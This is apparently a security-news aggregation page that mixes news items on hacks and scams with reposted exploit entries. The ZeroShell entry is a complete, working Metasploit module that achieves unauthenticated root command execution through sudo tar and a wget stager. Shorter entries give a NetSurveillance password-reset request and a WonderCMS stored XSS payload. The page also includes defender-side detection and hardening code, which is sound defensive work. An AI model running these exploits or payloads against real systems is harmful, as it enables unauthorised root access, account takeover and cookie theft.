Wednesday, January 15, 2025

ZeroShell 3.9.0 – ‘cgi-bin/kerbynet’ Remote Root Command Injection


CVE: 2019-12725

Platform: LINUX

Date: 2020-11-24

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Zeroshell 3.9.0 Remote Command Execution',
      'Description'    => %q{
        This module exploits an unauthenticated command injection vulnerability
        found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" URL.
        As sudo is configured to execute /bin/tar without a password (NOPASSWD)
        it is possible to run root commands using the "checkpoint" tar options.
      },
      'Author'         => [
        'Juan Manuel Fernandez', # Vulnerability discovery
        'Giuseppe Fuggiano <giuseppe[dot]fuggiano[at]gmail.com>', # Metasploit module
      ],
      'References'     => [
        ['CVE', '2019-12725'],
        ['URL', 'https://www.tarlogic.com/advisories/zeroshell-rce-root.txt'],
        ['URL', 'https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py']
      ],
      'DisclosureDate' => 'Jul 17 2019',
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'Platform'       => [ 'unix', 'linux' ],
      'Arch'           => [ ARCH_X86 ],
      'Targets'        => [
        ['Zeroshell 3.9.0 (x86)', {
          'Platform'    => 'linux',
          'Arch'        => ARCH_X86,
        }],
      ],
      'DefaultTarget'  => 0,
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
      ])
  end

  def execute_command(cmd, opts = {})
    command_payload  = "%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22#{filter_bad_chars(cmd)}%22%0A%27"

    print_status("Sending stager payload...")

    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/cgi-bin/kerbynet',
      'encode_params' => false,
      'vars_get' => {
        'Action' => 'x509view',
        'Section' => 'NoAuthREQ',
        'User' => '',
        'x509type' => command_payload
      }
    )

    return res
  end

  def filter_bad_chars(cmd)
    cmd.gsub!(/chmod \+x/, 'chmod 777')
    cmd.gsub!(/;/, " %0A ")
    cmd.gsub!(/ /, '+')
    cmd.gsub!(/\//, '%2F')
    return cmd
  end

  def check
    res = execute_command('id')
    if res && res.body.include?("uid=0(root)")
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_status("Exploiting...")
    execute_cmdstager(flavor: :wget, delay: 5)
  end

end
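The module above builds its injection into the x509type parameter of an unauthenticated GET to /cgi-bin/kerbynet. The following is an added defender-side example, not part of the Metasploit module or of the Tarlogic advisory: it scans web-server access-log lines for that request shape and flags the markers the payload relies on (a raw newline, the sudo'd tar call, and --checkpoint-action). The log lines, the combined-log format and the benign x509type value "PEM" are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Markers that the advisory's injection string places inside the x509type
# parameter: a raw newline to end the quoted shell argument, the sudo'd tar
# call, and the --checkpoint-action=exec option that runs the injected command.
INJECTION_MARKERS = ("\n", "sudo", "--checkpoint-action")

# Request field of a combined-format access log: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def inspect_target(target):
    """Return a finding dict for a kerbynet request that carries the
    injection pattern, or None for any other request."""
    parts = urlsplit(target)
    if parts.path != "/cgi-bin/kerbynet":
        return None
    # parse_qs percent-decodes and turns '+' into spaces, so we inspect the
    # value the CGI script itself would see rather than the encoded form.
    params = parse_qs(parts.query, keep_blank_values=True)
    x509type = params.get("x509type", [""])[0]
    hits = [m for m in INJECTION_MARKERS if m in x509type]
    if not hits:
        return None
    return {
        # Section=NoAuthREQ is the unauthenticated code path the module uses
        "unauthenticated_path": params.get("Section", [""])[0] == "NoAuthREQ",
        "markers": [repr(m) for m in hits],
        "decoded_x509type": x509type,
    }


def scan_access_log(lines):
    """Return a list of (line_number, finding) for every matching log line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        finding = inspect_target(match.group("target"))
        if finding:
            findings.append((number, finding))
    return findings


# Constructed sample log lines (not captured traffic). The third line carries
# the exact query string the module above builds for the command "id".
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Nov/2020:10:00:01 +0000] "GET /cgi-bin/kerbynet?Action=Login HTTP/1.1" 200 512',
    '10.0.0.5 - - [24/Nov/2020:10:00:02 +0000] "GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=PEM HTTP/1.1" 200 1024',
    '203.0.113.9 - - [24/Nov/2020:10:00:03 +0000] "GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27 HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for number, finding in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {finding}")
```

Matching on the decoded parameter rather than on the raw query string matters: the module's filter_bad_chars turns spaces into "+" and slashes into "%2F", so a rule written against the literal text "sudo tar" would miss the encoded request.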
            

PS5 Hacked To Run Original Metal Gear On Internal Web Browser

The original Metal Gear can be played on PS5

While the PlayStation 5 boasts a huge catalog of brand new upcoming titles, one player has found a way to access the decades-old classic Metal Gear

A PlayStation homebrew developer has managed to run the original Metal Gear through an internal web browser on the PlayStation 5. Metal Gear, the first in the long-running series directed by Hideo Kojima, was released on the MSX2 home computer back in 1987. The game spawned a series of sequels, culminating in the release of 2015’s Metal Gear Solid V: The Phantom Pain.

With Sony’s PlayStation 5 having been available to the public for nearly two weeks for some players, it should be expected that customizations will begin to crop up. Many gamers have begun to apply custom paint jobs to their consoles, giving the stark white design a beautiful splash of unique color. Popular PlayStation titles, such as Marvel’s Spider-Man, have been paid homage through custom paint jobs. One particularly impressive customization came in the form of a Mass Effect-inspired design, adorning the PS5 with the colors and insignia of the sci-fi saga’s N7 operatives.

Other players are tinkering with the PS5 hardware itself instead of its case. Twitter user psxdev has managed to get the original Metal Gear to run on a PlayStation 5, using an online MSX2 emulator. WebMSX was made to run on the new console thanks to an internal web browser that is not ordinarily accessible, but can be used through a back door. The emulator is available on most common web browsers, making it simple to access through the PS5.

The presence of a hidden web browser on the PlayStation 5 was reported shortly after the console’s release, and it is apparently still accessible. There exists an option to link the PS5 to other online services, such as Twitter, and choosing this option begins connecting the user to Twitter.

However, canceling the log-in will allow free access to the entire internet, allowing access to unintended services such as WebMSX. This discovery came shortly after Sony reported that the console would not be sporting a web browser, despite the fact that the PS3 and PS4 both included one.

With the recent launch of a new generation of consoles, it should be expected that gamers will begin exploring the new hardware and software at their fingertips. It is always cool to see technology used for unintended purposes, and one never needs an excuse to play some Metal Gear. As more and more people get their hands on the Xbox Series X/S and PlayStation 5, it seems likely that more and more exploits will be discovered.


Spotify Accounts Hacked by Credential Stuffing Based on Stolen Database


A database of 300 million records was being used for compromising 300,000 to 350,000 Spotify accounts.

While the database’s origin is still unknown, hackers have been using it to access Spotify accounts and sell them on to others. It was reported to Spotify in July, and Spotify performed a rolling password reset on all affected accounts.

Credential Stuffing Attack on Spotify

Spotify is the largest music platform by user base, with users from around the world. It is so popular that potential users are interested in paying a lower price for a subscription when one is on offer.

To meet that demand, hackers have been breaching Spotify accounts and reselling them to interested customers for profit.

One such incident has been unfolding this year, and VPNMentor’s report sheds light on how it happens.

The researchers said that a database containing over 300 million user records (usernames, passwords, e-mail addresses, etc.) was being used by hackers to credential stuff Spotify accounts.

Credential stuffing is a technique in which attackers take a list of usernames and passwords and try them against other online accounts of the targeted users.

It relies on the hope that a victim reuses the same login credentials across their other online accounts; where they do, the attackers can breach and take over those matching accounts.

The list used for such attempts is typically obtained from previous hacks and data breaches, and that may well be the case with Spotify too. VPNMentor said that a database of 300 million records was being used to compromise 300,000 to 350,000 Spotify accounts.

This was reported to Spotify in July this year, and Spotify replied the same day: “In response to our inquiry, Spotify initiated a ‘rolling reset’ of passwords for all users affected. As a result, the information on the database would be voided and become useless.” Spotify users are nevertheless recommended to change their passwords to strong, unique ones for better security.
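Credential stuffing as described above has a recognisable shape in authentication logs: one source address cycling through many different usernames, with most attempts failing. The following is an added example, not from VPNMentor’s report or from Spotify, of a sliding-window detector for that shape. The log format, the addresses and the thresholds (five distinct usernames and an 80% failure rate within five minutes) are all constructed for the example, not values from the article.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Detection thresholds. These are assumptions for the example, not values
# taken from the article or from any vendor's tuning.
WINDOW = timedelta(minutes=5)      # sliding window per source address
MIN_DISTINCT_USERS = 5             # distinct usernames tried from one source
MIN_FAILURE_RATIO = 0.8            # share of attempts in the window that failed


def parse_event(line):
    """Constructed log format: '<ISO timestamp> <source ip> <username> <success|failure>'."""
    ts, ip, user, outcome = line.split()
    return datetime.fromisoformat(ts), ip, user, outcome == "success"


def find_stuffing_sources(lines):
    """Return {source_ip: stats} for sources whose login attempts look like
    credential stuffing: many different usernames, mostly failing, within WINDOW."""
    by_ip = defaultdict(list)
    for ts, ip, user, ok in sorted(parse_event(line) for line in lines):
        by_ip[ip].append((ts, user, ok))

    flagged = {}
    for ip, attempts in by_ip.items():
        best = None
        start = 0
        for end in range(len(attempts)):
            # advance the window start so the window never spans more than WINDOW
            while attempts[end][0] - attempts[start][0] > WINDOW:
                start += 1
            window = attempts[start:end + 1]
            users = {user for _, user, _ in window}
            failures = sum(1 for _, _, ok in window if not ok)
            if (len(users) >= MIN_DISTINCT_USERS
                    and failures / len(window) >= MIN_FAILURE_RATIO
                    and (best is None or len(users) > best["distinct_users"])):
                # keep the widest qualifying window seen for this source
                best = {"distinct_users": len(users),
                        "attempts": len(window),
                        "failures": failures}
        if best:
            flagged[ip] = best
    return flagged


# Constructed sample: 203.0.113.7 cycles through eight different usernames in
# under two minutes and gets one hit (a stuffing run); 198.51.100.2 is a single
# user mistyping a password a few times before logging in normally.
SAMPLE_AUTH_LOG = [
    "2020-11-24T10:00:00 203.0.113.7 user1 failure",
    "2020-11-24T10:00:15 203.0.113.7 user2 failure",
    "2020-11-24T10:00:30 203.0.113.7 user3 failure",
    "2020-11-24T10:00:45 203.0.113.7 user4 failure",
    "2020-11-24T10:01:00 203.0.113.7 user5 failure",
    "2020-11-24T10:01:15 203.0.113.7 user6 failure",
    "2020-11-24T10:01:30 203.0.113.7 user7 failure",
    "2020-11-24T10:01:45 203.0.113.7 user8 success",
    "2020-11-24T10:02:00 198.51.100.2 alice failure",
    "2020-11-24T10:02:30 198.51.100.2 alice failure",
    "2020-11-24T10:03:00 198.51.100.2 alice failure",
    "2020-11-24T10:03:20 198.51.100.2 alice success",
]

if __name__ == "__main__":
    for ip, stats in find_stuffing_sources(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {stats}")
```

The distinct-username count is what separates stuffing from an ordinary forgotten password: the legitimate user fails three times but only ever tries one account, so a per-IP failure counter alone would produce a false positive while this rule does not. Real stuffing runs are usually spread across many source addresses, so in practice the same logic is also worth running keyed on other attributes (user agent, ASN) rather than only on the IP.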


WhatsApp OTP Scam: Save your personal, bank details from getting hacked

WhatsApp OTP Scam: Save your personal media, bank account details from getting hacked by using these methods

With the increase in usage of social media platforms and digital payment methods, hackers are finding new ways to attack users and steal their hard-earned money and private data. Now a new scam, known as the WhatsApp OTP scam, has come to light, and this time the scammers are using the instant-messaging app WhatsApp as their ladder to your bank accounts.

The WhatsApp OTP scam poses a bigger threat now that the instant-messaging app has recently received the green signal from the NPCI for its UPI-based payments facility, which also uses OTPs for transactions. In view of this, if your WhatsApp account gets compromised, hackers are likely to get hold of not just your data but also your bank account details.

So, here is how the latest WhatsApp OTP scam works and how you can avoid getting duped.

How does the WhatsApp OTP scam work?

In the WhatsApp OTP scam, the scammers contact you via SMS, pretending to be a friend or relative. The fraudster may even try to get your attention by describing some kind of emergency. After gaining your trust, the scammer asks you for an OTP, which they claim was accidentally forwarded to your number.

Once you share the OTP, you will be logged out of your WhatsApp account and the hacker gets full access to your messages, contacts and personal media. The hacker can also send messages to your friends and relatives and ask them for money. The chain of events multiplies once the scammer hijacks your account.

How to avoid getting duped?

If you mistakenly forwarded the OTP to the scammer, you should immediately reset your WhatsApp account and log in again. The rule of thumb for preventing this type of fraud is to never share any information without confirming that the message is genuine. You can also avoid this fraud by activating two-factor authentication in the app to increase the account’s security.


EU security blunder as ‘secret’ defence ministers call hacked and ..


A so-called ‘SECRET’ virtual call of EU defence ministers descended into chaos after a Dutch journalist managed to hack into the conference, prompting many members to burst out into laughter.

A confidential consultation between European Union Defence ministers was the victim of a hack. Journalist Daniel Verlaan from RTL News had managed to join the virtual meeting after guessing the password. This was possible because the Twitter account of Dutch Minister Ank Bijleveld briefly contained a photo with the login address and part of the pin code.

In footage taken, Mr Verlaan appears shocked as he realises he has actually made it onto the call.

He waves at the participants, causing many people to laugh.

The EU’s Minister for Foreign Affairs Josep Borrell jokingly asks: “How are you?”

The journalist replied: “I’m fine, how are you?”

Mr Borrell told him: “You know that you have been jumping into a secret conference?”

Mr Verlaan said: “Yes, yes. I’m sorry. I’m a journalist from the Netherlands.

“I’m sorry for interrupting your conference. I’ll be leaving here.”

The EU official added: “You know it’s a criminal offence, huh? You’d better set off quickly before the police arrives.”

The Dutch tech reporter decided to sign off then, saying “bye bye” to the conference before exiting the call.

Throughout the exchange, laughter can be heard coming from a lot of participants.

Mr Borrell apologises to the members even as many appear amused at the situation.


NetSurveillance Web interface password change

# Exploit Title: NetSurveillance Web interface password change
# Exploit Author: AsCiI
# Vendor Homepage: 
# Software Link: 
# Version: V4.02.R11.00000140.10001.131900.00000 maybe other
# Tested on: V4.02.R11.00000140.10001.131900.00000 Build 
# CVE : 
 
The NetSurveillance web interface password can be changed when no default
security question has been set, because the stored answer is then empty.
Tested on system: V4.02.R11.00000140.10001.131900.00000

 
 
POST /result.html?cLanguage=null HTTP/1.1
Host: [Host_Name]
Referer: http://[Host_Name]/reminder.html
Content-Type: application/x-www-form-urlencoded
Cookie: NetSuveillanceWebCookie=%7B%22username%22%3A%22admin%22%7D

Unlockquestion1=Please+select+Question&Unlockanswer1=&Unlockquestion2=Please+select+Question&Unlockanswer2=&password=000000&confirpossword=000000
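The root cause in the advisory is a comparison that passes when both the stored and the submitted answer are empty. The following is an added example, not the device’s firmware and not the advisory author’s code: a hypothetical reconstruction of that flawed reset check next to a hardened version, both fed the exact form body from the request above. The Account class, its defaults and the reset handlers are assumptions for the example; the field names (including the misspelt "confirpossword") and the "Please select Question" placeholder are taken from the request.

```python
import hmac
from urllib.parse import parse_qs

# Value the web form submits when no security question has been chosen
# (taken from the request body above).
NO_QUESTION = "Please select Question"

# Body of the request shown above, reused here as the sample input.
REQUEST_BODY = ("Unlockquestion1=Please+select+Question&Unlockanswer1="
                "&Unlockquestion2=Please+select+Question&Unlockanswer2="
                "&password=000000&confirpossword=000000")


class Account:
    """Hypothetical account record: question and answer stay at their empty
    defaults until an administrator configures them."""

    def __init__(self, username, password, question=NO_QUESTION, answer=""):
        self.username = username
        self.password = password
        self.question = question
        self.answer = answer


def parse_reset_form(body):
    """Pull the first question/answer pair and the new password out of the form."""
    fields = parse_qs(body, keep_blank_values=True)
    first = lambda key: fields.get(key, [""])[0]
    # 'confirpossword' is the field name the form really sends (see the request above)
    return {"question": first("Unlockquestion1"), "answer": first("Unlockanswer1"),
            "password": first("password"), "confirm": first("confirpossword")}


def weak_reset(account, form):
    """Reconstruction of the flawed logic the advisory describes (an assumption,
    not the device's code): an unset question has an empty stored answer, so an
    empty submitted answer compares equal and the password is replaced."""
    if form["password"] != form["confirm"]:
        return False
    if form["question"] == account.question and form["answer"] == account.answer:
        account.password = form["password"]
        return True
    return False


def hardened_reset(account, form):
    """Refuse the reset unless a real question is configured, a non-empty answer
    was supplied, and it matches the stored one in constant time."""
    if form["password"] != form["confirm"]:
        return False
    if account.question == NO_QUESTION or not account.answer:
        return False   # recovery path stays disabled until it is configured
    if form["question"] != account.question or not form["answer"]:
        return False
    if not hmac.compare_digest(form["answer"].encode(), account.answer.encode()):
        return False
    account.password = form["password"]
    return True


if __name__ == "__main__":
    form = parse_reset_form(REQUEST_BODY)
    unconfigured = Account("admin", "original-secret")
    print("weak handler accepted reset:", weak_reset(unconfigured, form))
    unconfigured = Account("admin", "original-secret")
    print("hardened handler accepted reset:", hardened_reset(unconfigured, form))
```

The hardened version fails closed: the "no question configured" state is treated as "this recovery path does not exist" rather than as "any answer is correct". In a real implementation the answer would also be stored hashed rather than in clear, and the reset endpoint would be rate-limited; neither is needed to show the logic flaw here.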
 

Police probe Manchester United cyber attack


Police say they are investigating a cyber attack against Manchester United.

The club confirmed the hacking on Friday evening and said it was “not currently aware of any breach of personal data associated with our fans and customers”.

On Saturday, a Greater Manchester Police spokeswoman said: “We are aware and currently investigating a cyber-related incident at Manchester United Football Club.”

A club statement read: “Manchester United can confirm that the club has experienced a cyber attack on our systems.

“The club has taken swift action to contain the attack and is currently working with expert advisers to investigate the incident and minimise the ongoing IT disruption.

“Although this is a sophisticated operation by organised cyber criminals, the club has extensive protocols and procedures in place for such an event and had rehearsed for this eventuality.

“Our cyber defences identified the attack and shut down affected systems to contain the damage and protect data.

“Club media channels, including our website and app, are unaffected and we are not currently aware of any breach of personal data associated with our fans and customers.

“We are confident that all critical systems required for matches to take place at Old Trafford remain secure and operational and that tomorrow’s (Saturday) game against West Bromwich Albion will go ahead.”

A spokesman for United added: “These type of attacks are becoming more and more common and are something you have to rehearse for.”

United have informed the Information Commissioner’s Office, as required, and the club say forensic tracing is being carried out in a bid to establish further detail about the attack.

Meanwhile, we reported earlier on Saturday that four British athletes were among “hundreds” of female sports stars and celebrities whose intimate photographs and videos were posted online in a separate attack.

Mobile phones were targeted: one UK athlete had nearly 100 private images stolen and another had more than 30 pictures and video clips taken, the newspapers added.


Female athletes hacked in ‘reprehensible’ naked photo leak


Hundreds of female sports stars and celebrities have had naked photos and videos stolen and leaked online in a ‘reprehensible’ cyber attack.

On the same night as Manchester United were hacked by ‘organised criminals’, four British athletes had their explicit content stolen from their phones and posted online.

The unnamed athletes are now considering their next move in an attempt to have the photos and videos removed from the internet.

“It really is difficult to know what to do next,” an agent of one of the athletes told The Times.

“The people who do this are sick.

“We have seen some very unpleasant cases, even where people have been blackmailed over [stolen] material.

“But it’s not easy to get a grip on the situation and go after them.

“It can take years to pursue, just to get it taken down from the internet. As a victim you have to decide if you want to go through it.”

One of the athletes reportedly had about 100 images stolen, while another had more than 30 pictures and videos leaked.

A spokesperson for the National Cyber Security Centre in the UK said the attack was “utterly reprehensible”.

“Accessing and then leaked people’s personal data is utterly reprehensible, and we would urge everyone to take steps to secure their online accounts,” they said.

“The NCSC recommends people turn on two-factor authentication where it’s available.

“We also recommend a strong password made up of three random words to reduce the likelihood of being hacked, and important accounts should use a unique password.

“The NCSC’s Cyber Aware website has actionable steps to stay secure.”


Cybersecurity expert urges Vatican to strengthen internet defences


A cyber security expert has urged the Vatican to take immediate action to strengthen its defenses against hackers.

Andrew Jenkinson, group CEO of Cybersec Innovation Partners (CIP) in London, said that he had contacted the Vatican in July to express concern about its vulnerability to cyber attacks.

He said that to date he had received no response, despite making several further attempts to raise the issue with the appropriate Vatican office.

The British cyber security consultancy approached the Vatican following reports in July that suspected Chinese state-sponsored hackers had targeted Vatican computer networks. CIP offered its services to address the vulnerabilities.

In a July 31 email to the Gendarmerie Corps of Vatican City State, Jenkinson suggested that the breach might have occurred through one of the Vatican’s many subdomains. 

Vatican City has a sprawling system of websites administered by the Internet Office of the Holy See and organized under the country code top-level domain “.va”. The Vatican’s web presence has expanded steadily since it launched its main website, www.vatican.va, in 1995.

Jenkinson sent follow-up emails in August and October, emphasizing the urgency of tackling weaknesses in the Vatican’s cyber defenses. He noted that www.vatican.va remained “not secure” months after the breach was reported. He also sought to contact the Vatican through intermediaries.

The Gendarmerie Corps confirmed Nov. 14 that it had received the information sent by Jenkinson. Its command office told CNA that his concerns “have been duly taken into consideration and transmitted, as far as their competence is concerned, to the offices that manage the website in question.”

A report, released July 28, said that hackers had breached Vatican websites in an attempt to give China an advantage in negotiations to renew a provisional deal with the Holy See.  

Researchers said they had uncovered “a cyberespionage campaign attributed to a suspected Chinese state-sponsored threat activity group,” which they referred to as RedDelta.

The study was compiled by the Insikt Group, the research arm of the U.S.-based cybersecurity company Recorded Future. 

In a follow-up analysis, published Sept. 15, the Insikt Group said that hackers had continued to focus on the Vatican and other Catholic organizations even after their activities were publicized in July.

It noted that RedDelta ceased its activities immediately after the publication of its initial report. 

“However, this was short-lived, and within 10 days, the group returned to its targeting of the Hong Kong Catholic Diocese mail server, and within 14 days, a Vatican mail server,” it said.––CNA


WonderCMS 3.1.3 – ‘content’ Persistent Cross-Site Scripting

# Exploit Title: WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.wondercms.com/
# Version: 3.1.3
# Tested on: Windows 10/Kali Linux

Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.

Attack vector:
This vulnerability allows an attacker to inject an XSS payload into the Page description; each time any user visits the website the XSS triggers, and the attacker can steal the cookie, depending on the crafted payload.

Vulnerable Parameters: Page description.

Steps-To-Reproduce:
1. Go to the Simple website builder.
2. Put this payload in Page description: "hemantsolo"><img src=x onerror=confirm(1)>"
3. Now go to the website and the XSS will be triggered.

POST /demo/ HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 196
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: 127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 127.0.0.1/demo/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: PHPSESSID=da4eae35135fd9ce3c413b936e2e5925

fieldname=description&token=c526c8235770f7efe7b7868a806f51f9a48545e117e00534e5cd82fde1bf1064&content=HemantSoloHacker%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm(1)%3E&target=pages&menu=&visibility=
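The advisory’s payload works because the description is written into the page without HTML encoding. The following is an added example, not WonderCMS code and not the advisory author’s: a minimal render function that concatenates the description raw, next to one that escapes it for the attribute and element contexts, with the page’s own payload as input. An HTMLParser pass over each output then shows what a browser would see, an img element carrying an onerror handler in the first case and none in the second. The template shape and the helper names are assumptions for the example.

```python
import html
from html.parser import HTMLParser

# The description value from the advisory's step 2, decoded from the request body above.
PAYLOAD = 'HemantSoloHacker"><img src=x onerror=confirm(1)>'

# Hypothetical page fragment: the description lands both in a meta attribute
# and inside an element, so it needs escaping in two different contexts.
TEMPLATE = '<meta name="description" content="%s">\n<p>%s</p>'


def render_unsafe(description):
    """Vulnerable form: the stored description is concatenated straight into the page."""
    return TEMPLATE % (description, description)


def render_safe(description):
    """Hardened form: quote=True escapes the quotes that would end the attribute,
    and the element body gets the standard &lt; &gt; &amp; treatment."""
    return TEMPLATE % (html.escape(description, quote=True), html.escape(description))


class TagCollector(HTMLParser):
    """Record every start tag with its attributes, the way a browser's
    tokenizer would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parsed_tags(fragment):
    parser = TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.tags


def has_event_handler_attribute(fragment):
    """True if any parsed element carries an on* attribute (onerror, onload, ...)."""
    return any(name.lower().startswith("on")
               for _, attrs in parsed_tags(fragment) for name in attrs)


if __name__ == "__main__":
    for label, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        out = render(PAYLOAD)
        print(f"--- {label} ---\n{out}")
        print("elements:", [tag for tag, _ in parsed_tags(out)])
        print("event handler present:", has_event_handler_attribute(out))
```

In the escaped output the quote and angle brackets survive only as &quot; &lt; &gt;, so the parser never leaves the meta attribute and the p element's text node. Note that escaping is context-specific: html.escape is right for HTML attribute and element bodies, but the same value dropped into a script block, a URL or a CSS property would need that context's encoder instead.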
      